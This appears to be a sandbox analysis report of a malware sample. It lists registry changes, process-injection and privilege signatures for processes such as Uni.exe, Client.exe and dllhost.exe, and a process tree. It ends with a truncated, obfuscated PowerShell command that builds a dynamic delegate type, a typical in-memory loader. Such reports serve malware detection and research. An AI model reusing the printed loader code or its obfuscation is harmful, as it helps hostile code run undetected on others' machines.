  Set value (str)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846  RuntimeBroker.exe
  Key created  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable  RuntimeBroker.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"  RuntimeBroker.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f = "\\\\?\\Volume{E9075ED3-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3f8be388a6e5d5acd16bab84d000b62642e0ed51d2c81a8c6f3d4368ea05250f"  RuntimeBroker.exe
  Set value (int)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f = "0"  RuntimeBroker.exe
  Key created  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519  RuntimeBroker.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519  RuntimeBroker.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 = "\\\\?\\Volume{E9075ED3-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\edc232bc484ce24bf6217939837fc6cbf03892ad9dff10d3c6fe8cbac931b9a6"  RuntimeBroker.exe
  Set value (data)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 = [value not preserved in this export]  RuntimeBroker.exe
  Set value (int)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 = "8324"  RuntimeBroker.exe
  Set value (int)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 = "0"  RuntimeBroker.exe
  Set value (data)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 =
0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000003cd2f4c381a3da01357f43c481a3da01357f43c481a3da01564407000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad01320000000000ab58254820006564633233
32626334383463653234626636323137393339383337666336636266303338393261643964666631306433633666653863626163393331623961360000b20009000400efbeab582548ab5825482e00000000000000000000000000000000000000000000000000bc227900650064006300320033003200620063003400380034006300650032003400620066003600320031003700390033003900380033003700660063003600630062006600300033003800390032006100640039006400660066003100300064003300630036006600650038006300620061006300390033003100620039006100360000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea00000018000000030000001e6bfc981000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65646332333262633438346365323462663632313739333938333766633663626630333839326164396466663130643363366665386362616339333162396136000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000075626c6e6a7268660000000000000000e402feced506964aba942aaf5ab964639148d9e434feee118e664e00a0a556b8e402feced506964aba942aaf5ab964639148d9e434feee118e664e00a0a556b8d2000000090000a08d00000031535053e28a5846bc4c3843bbfc139326986dce7100000004000000001f0000002f00000053002d0031002d0035002d00320031002d0031003400370034003400390030003100340033002d0033003200320031003200390032003300390037002d0034003100360038003100300033003500300033002d00310030003000300000000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000d35e07e9000000000000d012000000000000000000000000000000
00  RuntimeBroker.exe
  Set value (data)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f = [value not preserved in this export]  RuntimeBroker.exe
  Key created  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\  RuntimeBroker.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7  RuntimeBroker.exe
  Set value (data)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 = dd795fc481a3da01  RuntimeBroker.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"  RuntimeBroker.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 = "\\\\?\\Volume{E9075ED3-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\edc232bc484ce24bf6217939837fc6cbf03892ad9dff10d3c6fe8cbac931b9a6"  RuntimeBroker.exe
  Key deleted  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7  RuntimeBroker.exe
  Key created  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System  RuntimeBroker.exe
  Set value (data)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 = 5a07a3c381a3da01  RuntimeBroker.exe
  Set value (data)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f = 147d67c481a3da01  RuntimeBroker.exe
  Key created  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f  RuntimeBroker.exe
  Set value (int)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\15ebb458-1dd8-4c7f = "8324"  RuntimeBroker.exe
  Key deleted  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519  RuntimeBroker.exe
  Key deleted  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\b6fce597-5e82-45f3  RuntimeBroker.exe
  Set value (str)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy"  RuntimeBroker.exe
  Set value (data)  \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\93a8784b-5fe7-41e7 =
(binary value data) | RuntimeBroker.exe
Set value (data) \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\bc72a060-adef-4519 = ac31d7c381a3da01 | RuntimeBroker.exe
Key created \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5f0948a8-f179-4846 | RuntimeBroker.exe
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2104 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2572 powershell.EXE 2572 powershell.EXE 908 powershell.EXE 908 powershell.EXE 2572 powershell.EXE 2600 dllhost.exe 2600 dllhost.exe 2600 dllhost.exe 2600 dllhost.exe 4132 Client.exe 2600 dllhost.exe 2600 dllhost.exe 908 powershell.EXE 2600 dllhost.exe 2600 dllhost.exe 2600 dllhost.exe 2600 dllhost.exe 908 powershell.EXE 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4132 Client.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe 4876 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3292 Explorer.EXE -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3584 Uni.exe Token: SeDebugPrivilege 2572 powershell.EXE Token: SeDebugPrivilege 4132 Client.exe Token: SeDebugPrivilege 908 powershell.EXE Token: SeDebugPrivilege 2572 powershell.EXE Token: SeDebugPrivilege 2600 dllhost.exe Token: SeDebugPrivilege 908 powershell.EXE Token: SeDebugPrivilege 4876 dllhost.exe Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeAuditPrivilege 2204 svchost.exe Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeAuditPrivilege 2204 svchost.exe Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: 
SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 476 dwm.exe Token: SeCreatePagefilePrivilege 476 dwm.exe Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE Token: SeShutdownPrivilege 3292 Explorer.EXE Token: SeCreatePagefilePrivilege 3292 Explorer.EXE -
Suspicious use of FindShellTrayWindow 26 IoCs
pid Process 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
pid Process 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe 2336 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4132 Client.exe 2004 ScreenClippingHost.exe -
Suspicious use of UnmapMainImage 2 IoCs
pid Process 3908 RuntimeBroker.exe 3292 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3584 wrote to memory of 4424 3584 Uni.exe 81 PID 3584 wrote to memory of 4424 3584 Uni.exe 81 PID 3584 wrote to memory of 4424 3584 Uni.exe 81 PID 3584 wrote to memory of 4132 3584 Uni.exe 83 PID 3584 wrote to memory of 4132 3584 Uni.exe 83 PID 3584 wrote to memory of 4132 3584 Uni.exe 83 PID 3584 wrote to memory of 4416 3584 Uni.exe 84 PID 3584 wrote to memory of 4416 3584 Uni.exe 84 PID 3584 wrote to memory of 4416 3584 Uni.exe 84 PID 3584 wrote to memory of 2036 3584 Uni.exe 85 PID 3584 wrote to memory of 2036 3584 Uni.exe 85 PID 3584 wrote to memory of 2036 3584 Uni.exe 85 PID 4132 wrote to memory of 2132 4132 Client.exe 89 PID 4132 wrote to memory of 2132 4132 Client.exe 89 PID 4132 wrote to memory of 2132 4132 Client.exe 89 PID 4132 wrote to memory of 2812 4132 Client.exe 91 PID 4132 wrote to memory of 2812 4132 Client.exe 91 PID 4132 wrote to memory of 2812 4132 Client.exe 91 PID 2572 wrote to memory of 2600 2572 powershell.EXE 94 PID 2572 wrote to memory of 2600 2572 powershell.EXE 94 PID 2572 wrote to memory of 2600 2572 powershell.EXE 94 PID 2572 wrote to memory of 2600 2572 powershell.EXE 94 PID 2572 wrote to memory of 2600 2572 powershell.EXE 94 PID 2572 wrote to memory of 2600 2572 powershell.EXE 94 PID 2572 wrote to memory of 2600 2572 powershell.EXE 94 PID 2572 wrote to memory of 2600 2572 powershell.EXE 94 PID 2600 wrote to memory of 632 2600 dllhost.exe 5 PID 2600 wrote to memory of 692 2600 dllhost.exe 7 PID 2600 wrote to memory of 1000 2600 dllhost.exe 12 PID 2600 wrote to memory of 476 2600 dllhost.exe 13 PID 2600 wrote to memory of 536 2600 dllhost.exe 14 PID 2600 wrote to memory of 452 2600 dllhost.exe 15 PID 2600 wrote to memory of 1048 2600 dllhost.exe 16 PID 2600 wrote to memory of 1092 2600 dllhost.exe 17 PID 2600 wrote to memory of 1104 2600 dllhost.exe 18 PID 2600 wrote to memory of 1172 2600 dllhost.exe 20 PID 2600 wrote to memory of 1228 2600 dllhost.exe 21 PID 2600 wrote to memory of 1252 2600 
dllhost.exe 22 PID 2600 wrote to memory of 1368 2600 dllhost.exe 23 PID 2600 wrote to memory of 1384 2600 dllhost.exe 24 PID 2600 wrote to memory of 1416 2600 dllhost.exe 25 PID 2600 wrote to memory of 1504 2600 dllhost.exe 26 PID 2600 wrote to memory of 1520 2600 dllhost.exe 27 PID 2600 wrote to memory of 1660 2600 dllhost.exe 28 PID 2600 wrote to memory of 1704 2600 dllhost.exe 29 PID 2600 wrote to memory of 1716 2600 dllhost.exe 30 PID 2600 wrote to memory of 1812 2600 dllhost.exe 31 PID 2600 wrote to memory of 1824 2600 dllhost.exe 32 PID 2600 wrote to memory of 1892 2600 dllhost.exe 33 PID 2600 wrote to memory of 1904 2600 dllhost.exe 34 PID 2600 wrote to memory of 1988 2600 dllhost.exe 35 PID 2600 wrote to memory of 2028 2600 dllhost.exe 36 PID 2600 wrote to memory of 1864 2600 dllhost.exe 37 PID 2600 wrote to memory of 2204 2600 dllhost.exe 39 PID 2600 wrote to memory of 2380 2600 dllhost.exe 40 PID 2600 wrote to memory of 2388 2600 dllhost.exe 41 PID 2600 wrote to memory of 2416 2600 dllhost.exe 42 PID 2600 wrote to memory of 2508 2600 dllhost.exe 43 PID 2600 wrote to memory of 2516 2600 dllhost.exe 44 PID 2600 wrote to memory of 2532 2600 dllhost.exe 45 PID 2600 wrote to memory of 2556 2600 dllhost.exe 46 PID 2600 wrote to memory of 2576 2600 dllhost.exe 47 PID 2600 wrote to memory of 2592 2600 dllhost.exe 48 PID 2600 wrote to memory of 3060 2600 dllhost.exe 50 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
Format: [depth] image path | command line | PID, with the signatures matched by that process listed beneath it.
[depth 1] C:\Windows\system32\winlogon.exe | winlogon.exe | PID 632
[depth 2] C:\Windows\system32\dwm.exe | "dwm.exe" | PID 476
- Suspicious use of AdjustPrivilegeToken
[depth 2] C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{bca2a637-b1c8-4b93-a233-b7b38892bfff} | PID 2600
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
[depth 2] C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{a47b2deb-b8d4-43a8-88d6-950657a72d90} | PID 4876
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
[depth 2] C:\Windows\System32\dllhost.exe | C:\Windows\System32\dllhost.exe /Processid:{d66f85d8-4632-48b1-9159-f62f62ce7529} | PID 4800
[depth 1] C:\Windows\system32\lsass.exe | C:\Windows\system32\lsass.exe | PID 692
[depth 1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM | PID 1000
[depth 1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc | PID 536
[depth 1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts | PID 452
[depth 1] C:\Windows\System32\svchost.exe | C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService | PID 1048
[depth 1] C:\Windows\system32\svchost.exe | C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | PID 1092
- Drops file in System32 directory
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:XwSckbyoJfWJ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$pFKKtfuoaoKLVX,[Parameter(Position=1)][Type]$PlAXLzpOgy)$VZdZBoOQteo=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+'e'+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+'at'+[Char](101)+''+'T'+'y'+'p'+'e',''+[Char](67)+''+'l'+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+'d'+[Char](44)+''+'A'+''+[Char](110)+'si'+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](65)+'u'+[Char](116)+'o'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$VZdZBoOQteo.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+[Char](72)+''+'i'+''+[Char](100)+''+[Char](101)+'BySi'+[Char](103)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$pFKKtfuoaoKLVX).SetImplementationFlags('R'+[Char](117)+'ntime'+[Char](44)+''+[Char](77)+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$VZdZBoOQteo.DefineMethod('I'+[Char](110)+'vo'+'k'+''+[Char](101)+'',''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](
72)+''+'i'+'d'+[Char](101)+''+'B'+''+'y'+''+'S'+''+[Char](105)+''+'g'+','+[Char](78)+'e'+'w'+'S'+[Char](108)+'o'+'t'+''+[Char](44)+'V'+[Char](105)+'r'+[Char](116)+'u'+[Char](97)+'l',$PlAXLzpOgy,$pFKKtfuoaoKLVX).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $VZdZBoOQteo.CreateType();}$NjzmZAAkwDXxq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 